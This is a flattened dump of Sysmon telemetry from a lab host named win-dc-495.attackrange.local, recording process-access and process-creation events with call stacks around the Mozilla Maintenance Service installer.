13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\TypeDWORD (0x00000010) 10341000x800000000000000016290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+57f3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+1eeb|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 154100x800000000000000016284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.196{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe84.0.2-FirefoxMozilla Foundationmaintenanceservice.exe"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" installC:\Program Files (x86)\Mozilla Maintenance Service\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=D80C4ABA0AFE02BFB75025087CEBB09B,SHA256=E1BD8385AA61F645C6390BD8A67D3EBB72A5B938FB50C66A7FBF2601D69BA2DF,IMPHASH=E4793B8A2E804520C3AE2CFD62D76D97{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe"C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe" 10341000x800000000000000016283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3 10341000x800000000000000016279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
